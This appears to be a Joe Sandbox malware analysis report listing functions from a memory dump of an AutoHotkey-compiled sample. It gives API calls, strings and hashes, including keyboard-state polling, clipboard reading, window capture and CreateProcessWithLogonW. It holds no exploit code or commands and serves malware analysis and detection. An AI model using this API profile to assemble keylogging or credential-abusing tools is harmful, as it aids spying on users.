Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ClassForegroundNameVisible__wcsicoll__wcsnicmp_wcsrchr
String ID: "%s"$#32770$.ini$AutoHotkey$Could not open script.$edit$notepad.exe$open
API String ID: 2434504450-1958138439
Opcode ID: d117cd5d2d83b3cdba773995e79a92886cd2c5fd219326a1fa9fc8ef53ddeda9
Instruction ID: 4edc151c2b9b865657b1c3c133587510d55bc16dee55f4d68fc42ccacedbd992
Opcode Fuzzy Hash: d117cd5d2d83b3cdba773995e79a92886cd2c5fd219326a1fa9fc8ef53ddeda9
Instruction Fuzzy Hash: 1A41267134020067E710AB2ACC42FE77699AB99714F48457AFD48DB385E7ADDC81836A

Uniqueness

Uniqueness Score: -1.00%

Function 0045B0B0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(advapi32,?,00000000), ref: 0045B0C4
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 0045B0F9
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0045B108
_memset.LIBCMT ref: 0045B13A
CloseHandle.KERNEL32(?), ref: 0045B1E0
GetLastError.KERNEL32 ref: 0045B202
FreeLibrary.KERNEL32(00000000), ref: 0045B20F

Strings

D, xrefs: 0045B147
CreateProcessWithLogonW., xrefs: 0045B11B
advapi32, xrefs: 0045B0BB
CreateProcessWithLogonW, xrefs: 0045B0F3
RunAs: Missing advapi32.dll., xrefs: 0045B0DD

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Library$Free$AddressCloseErrorHandleLastLoadProc_memset
String ID: CreateProcessWithLogonW$CreateProcessWithLogonW.$D$RunAs: Missing advapi32.dll.$advapi32
API String ID: 3715048715-4276146922
Opcode ID: 2fba296c5db7fa95bc879cce43244454fad060589f44d73495cb156c120780ef
Instruction ID: 1b714ff07fcc1df8b8343e0bf7b96c99f13913fd9e5f246fc39838007746ad15
Opcode Fuzzy Hash: 2fba296c5db7fa95bc879cce43244454fad060589f44d73495cb156c120780ef
Instruction Fuzzy Hash: 3E416E317407019BE7209F298C95B6B77E4EF85791F14442AFD50DB392EB78E8048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425330, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 91COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0042544F

Strings

{, xrefs: 00425393
!, xrefs: 00425373
This line does not contain a recognized action., xrefs: 0042542F
+, xrefs: 00425363
:, xrefs: 0042535B
&, xrefs: 0042537B
(, xrefs: 0042534B
*, xrefs: 0042536B
^, xrefs: 00425383
., xrefs: 0042538B
<, xrefs: 00425353

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy
String ID: !$&$($*$+$.$:$<$This line does not contain a recognized action.$^${
API String ID: 1735881322-2159613654
Opcode ID: 522b81f2e018de00b9b1ff66c14d8a16125f4dde9505f672707d63dfce5766d1
Instruction ID: 83d33dd6336d9c51efd99531c2443cbab06d09077157f3e92f610ae76e0cba9f
Opcode Fuzzy Hash: 522b81f2e018de00b9b1ff66c14d8a16125f4dde9505f672707d63dfce5766d1
Instruction Fuzzy Hash: 8331F236A047218AC324AF19A4443BFF7A0FFD4344F94981BE89987341E7B88999C796

Uniqueness

Uniqueness Score: -1.00%

Function 00429F50, Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 469COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 0042A1B5

Strings

., xrefs: 0042A03B
Duplicate declaration., xrefs: 0042A31E
this, xrefs: 0042A188, 0042A19F
base.__Init(), xrefs: 0042A3F5
%s.%.*s := %.*s, , xrefs: 0042A1A5
Declaration too long., xrefs: 0042A351
__Init(), xrefs: 0042A387
Invalid class variable declaration., xrefs: 0042A2E8, 0042A36E
Out of memory., xrefs: 0042A339
Unknown class var., xrefs: 0042A303

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __snwprintf
String ID: %s.%.*s := %.*s, $.$Declaration too long.$Duplicate declaration.$Invalid class variable declaration.$Out of memory.$Unknown class var.$__Init()$base.__Init()$this
API String ID: 2391506597-2474163602
Opcode ID: 16d3433485b75f0aacca49e6e6777ad4787fab8a859ebaffc20096f8a1bd014f
Instruction ID: 21fba3fdde0d040ae1aa6187324b8d2dd45abf141b0435490ebe97dd74b8bc99
Opcode Fuzzy Hash: 16d3433485b75f0aacca49e6e6777ad4787fab8a859ebaffc20096f8a1bd014f
Instruction Fuzzy Hash: 71F1CF717043109BC724DF19E880A6BB7E0EB99310F94895FED498B381E379D855CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00413EC0, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

wM, xrefs: 00413FD7
@, xrefs: 00413F89

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: wM$@
API String ID: 0-243138201
Opcode ID: 25c9d847ecd556773e57b70b992aa26a5a0a56e58ecceb13ba6b7edfdbad3276
Instruction ID: d156a486814c7e2c987a34955606d51153d16616db389e76827beb03e6b53e3f
Opcode Fuzzy Hash: 25c9d847ecd556773e57b70b992aa26a5a0a56e58ecceb13ba6b7edfdbad3276
Instruction Fuzzy Hash: 6791B13050A3948EE310CF28D8547A6BFF1EF99310F4A807FE5844B3A1E7799948DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404BF0, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 181fileclipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(0000000D), ref: 00404C09
IsClipboardFormatAvailable.USER32(0000000F), ref: 00404C0F

Part of subcall function 004050A0: GetClipboardFormatNameW.USER32(0000000D,00000104,00000104), ref: 004050CC
Part of subcall function 004050A0: __wcsnicmp.LIBCMT ref: 004050DE
Part of subcall function 004050A0: __wcsicoll.LIBCMT ref: 004050F7
Part of subcall function 004050A0: __wcsicoll.LIBCMT ref: 0040510C
Part of subcall function 004050A0: __wcsicoll.LIBCMT ref: 00405121
Part of subcall function 004050A0: __wcsicoll.LIBCMT ref: 00405136
Part of subcall function 004050A0: __wcsicoll.LIBCMT ref: 0040514B
Part of subcall function 004050A0: __wcsicoll.LIBCMT ref: 00405160

GlobalUnlock.KERNEL32(00000000,004D870C,?,?,00401033), ref: 00404C81
CloseClipboard.USER32(004D870C,?,?,00401033), ref: 00404C8D
GlobalLock.KERNEL32 ref: 00404CA8
DragQueryFileW.SHELL32(00000000,000000FF,004AE8F8,00000000), ref: 00404D0C
DragQueryFileW.SHELL32(?,00000000,00000000,00000000), ref: 00404D2D
DragQueryFileW.SHELL32(?,000000FF,004AE8F8,00000000), ref: 00404D7B
DragQueryFileW.SHELL32(?,00000000,00000000,000003E7), ref: 00404D9E

Strings

Can't open clipboard for reading., xrefs: 00404C3E
GlobalLock, xrefs: 00404CB7

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$ClipboardDragFileQuery$Format$AvailableGlobal$CloseLockNameUnlock__wcsnicmp
String ID: Can't open clipboard for reading.$GlobalLock
API String ID: 1478223189-2469064134
Opcode ID: fa9ea379d1324ab1fd87cea1ba1df097ffad69aa0ea3f6aa67036878165738d0
Instruction ID: 0c558ae50e2a1456a1b0c0cc86dc500456d4f67a1ffdee8be5e5a150dbfdf965
Opcode Fuzzy Hash: fa9ea379d1324ab1fd87cea1ba1df097ffad69aa0ea3f6aa67036878165738d0
Instruction Fuzzy Hash: F051B6F77022189BC6206FE9BC8457B7795DBC5322321463FE611A77D0DE3A98418B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0043A3A0, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 170COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(745DBB20,?,?,00000001), ref: 0043A3AA
GetWindowTextW.USER32 ref: 0043A3BF
_wcsncpy.LIBCMT ref: 0043A466

Strings

..., xrefs: 0043A460
Press [F5] to refresh., xrefs: 0043A59B
yes, xrefs: 0043A4DD, 0043A4F0, 0043A546
Object, xrefs: 0043A3FF
Key History has been disabled via #KeyHistory 0., xrefs: 0043A5A2, 0043A5B2
Window: %sKeybd hook: %sMouse hook: %sEnabled Timers: %u of %u (%s)Interrupted threads: %d%sPaused threads: %d of %d (%d, xrefs: 0043A54F
, xrefs: 0043A476
%s , xrefs: 0043A413

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ForegroundText_wcsncpy
String ID: Key History has been disabled via #KeyHistory 0.$Press [F5] to refresh.$ $%s $...$Object$Window: %sKeybd hook: %sMouse hook: %sEnabled Timers: %u of %u (%s)Interrupted threads: %d%sPaused threads: %d of %d (%d$yes
API String ID: 216113120-1572215845
Opcode ID: 43f81583cc0580383fdd19813e86dd63ff3d2175ae0a2fba877d63b4315b846c
Instruction ID: 1926bebd7fa97b323392710504311ced352a80f63083537c2f8a61bda63f1598
Opcode Fuzzy Hash: 43f81583cc0580383fdd19813e86dd63ff3d2175ae0a2fba877d63b4315b846c
Instruction Fuzzy Hash: E751F7715042015BD324DB18DC48AAB73A8EF99304F444A3FE989D7360E7B9ED14C79B

Uniqueness

Uniqueness Score: -1.00%

Function 0043E7C0, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 167COMMON

Download Yara Rule

Strings

Timeout, xrefs: 0043E7E5
Stopped, xrefs: 0043E9A2
EndKey, xrefs: 0043E96C
Max, xrefs: 0043E97E
Match, xrefs: 0043E7F7
sc%03X, xrefs: 0043E92D
NewInput, xrefs: 0043E990
EndKey:, xrefs: 0043E824

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: EndKey$EndKey:$Match$Max$NewInput$Stopped$Timeout$sc%03X
API String ID: 0-3482771585
Opcode ID: d58ae10f4fcc87343a3de23ca5ccc71d586f7a8b1179590ba369b35dd37b0062
Instruction ID: d19ae2af3111cb0b6c6b25e3dadd6d072ccb393c388198d24a11d037582843e8
Opcode Fuzzy Hash: d58ae10f4fcc87343a3de23ca5ccc71d586f7a8b1179590ba369b35dd37b0062
Instruction Fuzzy Hash: 83514972B0435456E334972AE8417F7B7A0DF99321F08843FE681863C1E66E9999C37A

Uniqueness

Uniqueness Score: -1.00%

Function 00437B80, Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 265COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00437BC9
_wcsncpy.LIBCMT ref: 00437C33
_wcschr.LIBCMT ref: 00437C7A
_memmove.LIBCMT ref: 00437CC6
_wcschr.LIBCMT ref: 00437CD3

Strings

", xrefs: 00437C99
Out of memory., xrefs: 00437BE0

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _wcschr$_malloc_memmove_wcsncpy
String ID: "$Out of memory.
API String ID: 278627150-1555670740
Opcode ID: 3eea7b7642706e0654c209d84fb43d880c1cdfc51d839b427e06bb8b71e0e9bf
Instruction ID: 3e6d99e2ef893583ebff18b0340d7e7ba0f48f5c3bedc616a377e6eeaea7fc23
Opcode Fuzzy Hash: 3eea7b7642706e0654c209d84fb43d880c1cdfc51d839b427e06bb8b71e0e9bf
Instruction Fuzzy Hash: 7A91C4B1E042159BCF30DF58D881AAFB7B4EF48310F15506AE845A7341E778AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411A00, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 0047E600: _vswprintf_s.LIBCMT ref: 0047E619

__itow.LIBCMT ref: 00411A8B

Strings

%s%s%s%s%s%s, xrefs: 00411CAA
TypeOff?LevelRunningName-------------------------------------------------------------------, xrefs: 00411A0F
(no), xrefs: 00411C82
PART, xrefs: 00411BC1
OFF, xrefs: 00411B71, 00411B8D, 00411C9C
%i-%i, xrefs: 00411BF6

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __itow_vswprintf_s
String ID: %i-%i$%s%s%s%s%s%s$(no)$OFF$PART$TypeOff?LevelRunningName-------------------------------------------------------------------
API String ID: 2948144822-1635122839
Opcode ID: 4a05766cae466ae87c095e2d2c37c7f122c3fdd1d67403a13e25d4f7a0e4523f
Instruction ID: d233566c055d2fa52ae8a89f972db8df40b6e31dadf25ba7dd4d28b6705fab2b
Opcode Fuzzy Hash: 4a05766cae466ae87c095e2d2c37c7f122c3fdd1d67403a13e25d4f7a0e4523f
Instruction Fuzzy Hash: BC81DE7060C3058AD724DF248950BF777E1AF85344F18492FE68A872A1F66CE985C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00440E70, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

Parameter #1 invalid., xrefs: 00440E92

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Parameter #1 invalid.
API String ID: 3832890014-1208927624
Opcode ID: e83581fd75a8f42a2bb7213b238358f10156eabac9b0216c158a3e8c0cd2ba69
Instruction ID: 7c444d41200acfa5cdffc36400c2dde792b3dbc0bf77dfec1cfc7f267106a0fd
Opcode Fuzzy Hash: e83581fd75a8f42a2bb7213b238358f10156eabac9b0216c158a3e8c0cd2ba69
Instruction Fuzzy Hash: C2517C3270421057F3306B6AAC85B2B7794EB95361F14423BFB449B2D2DBB98C9487DE

Uniqueness

Uniqueness Score: -1.00%

Function 00442CF0, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 182windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 00442CFD
GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00442D41
_malloc.LIBCMT ref: 00442D94
SelectObject.GDI32(?,?), ref: 00442DD7
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00442DF7
GetSystemPaletteEntries.GDI32(?,00000000,00000100), ref: 00442E27

Strings

(, xrefs: 00442D30

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Bits$CompatibleCreateEntriesObjectPaletteSelectSystem_malloc
String ID: (
API String ID: 1101625044-3887548279
Opcode ID: de37706fc177f0cf49867752de9c0f6a726bcb5cdcea845ee8a95df6a39ebdb6
Instruction ID: 7a8c78e5d45aa8270747a7fe378ce4eecff142841e6ab985e119e9637cacf75e
Opcode Fuzzy Hash: de37706fc177f0cf49867752de9c0f6a726bcb5cdcea845ee8a95df6a39ebdb6
Instruction Fuzzy Hash: 28619271A002199FEF10CFA5CC84BEE7BB5EF49310F5481AAF905A7341D678AD45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405A5A, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

inet_ntoa.WSOCK32(00000010), ref: 00405BD9
_strcpy_s.LIBCMT ref: 00405BFB

Strings

65535, xrefs: 00405A63
udp, xrefs: 00405AF0

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _strcpy_sinet_ntoa
String ID: 65535$udp
API String ID: 74754944-1267037602
Opcode ID: dcf1aa45254541c666509e7ef3279d839dbb11b76fffdad0219ded742900f438
Instruction ID: 4ee3f3f03342f635d73e80e6af4cad8b3abfacf135a932fe632de946eb8684f1
Opcode Fuzzy Hash: dcf1aa45254541c666509e7ef3279d839dbb11b76fffdad0219ded742900f438
Instruction Fuzzy Hash: 2E518E35605A0A9BDF249E28C845AAB3BB4EF05341F14853BF811A62D0E77CB945CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 00418250, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 87keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(000000A0), ref: 00418279
GetAsyncKeyState.USER32(000000A1), ref: 0041828F
GetAsyncKeyState.USER32(000000A2), ref: 004182A5
GetAsyncKeyState.USER32(000000A3), ref: 004182BB
GetAsyncKeyState.USER32(000000A4), ref: 004182D1
GetAsyncKeyState.USER32(000000A5), ref: 004182E7
GetAsyncKeyState.USER32(0000005B), ref: 004182FA
GetAsyncKeyState.USER32(0000005C), ref: 0041830D

Strings

@, xrefs: 00418306
wM, xrefs: 00418357

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AsyncState
String ID: wM$@
API String ID: 425341421-243138201
Opcode ID: 72612c42c625df2ace8429c65236592765b74b3a752eab889d8cc5db8604e8d0
Instruction ID: f4cb0873148cc63e3e15e37947e83cf53d0c117229e415dca99d8412e14089aa
Opcode Fuzzy Hash: 72612c42c625df2ace8429c65236592765b74b3a752eab889d8cc5db8604e8d0
Instruction Fuzzy Hash: F331C43021D7C555F7129328C8147EB6FD05B46760F1CC0AFAAD0072D2AEB88888DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0041B030, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 58COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041B064

Strings

MonitorPrimary, xrefs: 0041B076
MonitorWorkArea, xrefs: 0041B0A6
Monitor, xrefs: 0041B08E
MonitorCount, xrefs: 0041B05E
MonitorName, xrefs: 0041B0BE

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Monitor$MonitorCount$MonitorName$MonitorPrimary$MonitorWorkArea
API String ID: 3832890014-629551668
Opcode ID: 0e16e87c04fa6223b60b9b2d5dd6df554d5dd58357574acc131b3c2a465946df
Instruction ID: cdd35228d8794413a97819102f82302e03ebc0cf50cdfcfa62671b526b97e34c
Opcode Fuzzy Hash: 0e16e87c04fa6223b60b9b2d5dd6df554d5dd58357574acc131b3c2a465946df
Instruction Fuzzy Hash: FE018665B4061122EE21213D8C03BDB38448BD6B0AFD4857AF918D53C2FBCEC95481EE

Uniqueness

Uniqueness Score: -1.00%

Function 0041BCD0, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041BCE0
__wcsicoll.LIBCMT ref: 0041BCF8

Strings

WaitClose, xrefs: 0041BD3A
Wait, xrefs: 0041BD22
Exist, xrefs: 0041BCDA
Close, xrefs: 0041BCF2
Priority, xrefs: 0041BD0A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Close$Exist$Priority$Wait$WaitClose
API String ID: 3832890014-1466124334
Opcode ID: 00b3e7c91cdf8ccccadea7d342b73d5721779e74449b7c6ca6f1595033088ca2
Instruction ID: 4d2cfcb76b7c67338c6b847bb51ef1eac7518cad4444dcc17fcbd761e0296c4e
Opcode Fuzzy Hash: 00b3e7c91cdf8ccccadea7d342b73d5721779e74449b7c6ca6f1595033088ca2
Instruction Fuzzy Hash: B7F03062A8151122DE25213DAD037DF30489BA3B0BFD5857EFC04D52D2FB8D9A9990FE

Uniqueness

Uniqueness Score: -1.00%

Function 00475B90, Relevance: 16.6, APIs: 11, Instructions: 146windowthreadCOMMON

Download Yara Rule

APIs

CheckMenuItem.USER32(?,0000FF19,?), ref: 00475BEB
CheckMenuItem.USER32(?,0000FF1A,?), ref: 00475C0B
GetCursorPos.USER32(?), ref: 00475C26
GetForegroundWindow.USER32(?,?,?,?,00444ABE,80000000,80000000), ref: 00475C72
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00475C87
SetForegroundWindow.USER32(?,?,?,?,?,00444ABE,80000000,80000000), ref: 00475CA2
SetForegroundWindow.USER32(?,?,?,?,?,?,?,00444ABE,80000000,80000000), ref: 00475CC9
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,?,?,00444ABE,80000000,80000000), ref: 00475CEE
PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00475D13
